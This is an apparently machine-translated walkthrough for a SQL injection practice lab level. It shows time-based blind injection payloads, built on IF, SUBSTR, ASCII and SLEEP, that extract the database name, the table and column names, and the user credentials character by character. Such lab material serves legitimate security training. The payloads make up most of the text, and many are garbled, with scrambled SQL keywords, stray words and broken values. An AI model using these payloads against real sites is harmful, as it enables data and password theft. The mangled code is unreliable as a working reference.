Less-10 Get - Blind -Time based -double quotes
based on the time blinds
(Less-9 Less-10 differs in that a single quote is a double quotes, consistent with other determination step)
The right of direct return, the wrong time to wait for 5 seconds.
1. guess database:
the above mentioned id = 1 "and the If (ASCII (substr (Database (), 1, 1)) = 115,1, SLEEP (5)) - +?
The above mentioned id = 1?" And the If (ASCII (substr ( database (), 1,1)) = 114,1, sleep (5)) - +
described first is S (ASCII code 115)
? id = 1 "and If ( ascii (substr (database (), 2,1)) = 101,1, sleep (5)) - +
Description second is e (ascii code is 101)
... and so on, get the name of the database security
2. speculation data security database table:
? The above mentioned id = 1 "and the If (ASCII (substr ((information_schema.tables the WHERE from the SELECT table_name table_schema = 'security' limit 0, 1), 1, 1)) = 101, 1, sleep (5)) - +
described first bit of the first data table is E,
... and so on, to give emails
? = ID. 1 "and the If (ASCII (substr ((SELECT from table_name WHERE information_schema.tables TABLE_SCHEMA = 'Security' limit 1,1), 1,1)) = 114,1, SLEEP (. 5)) - +
(Analyzing steps above) after several attempts to get all the data sheets emails, referers, uagents, users
3. guessing users column of the table:
? The above mentioned id = 1 "and the If (ASCII (substr ((information_schema.columns the WHERE from the SELECT column_name table_name = 'users' limit 0, 1), 1, 1)) = 105,1, SLEEP (5)) - +
(supra determination step) several attempts, the column name is id, username, password
4. guess the username value:
? = ID. 1 "and the If (ASCII (substr ((SELECT username from Users limit 0,1), 1,1)) = - 68 and, SLEEP (. 5)) - +
(decision step Ibid.) several attempts to get all the user names and passwords
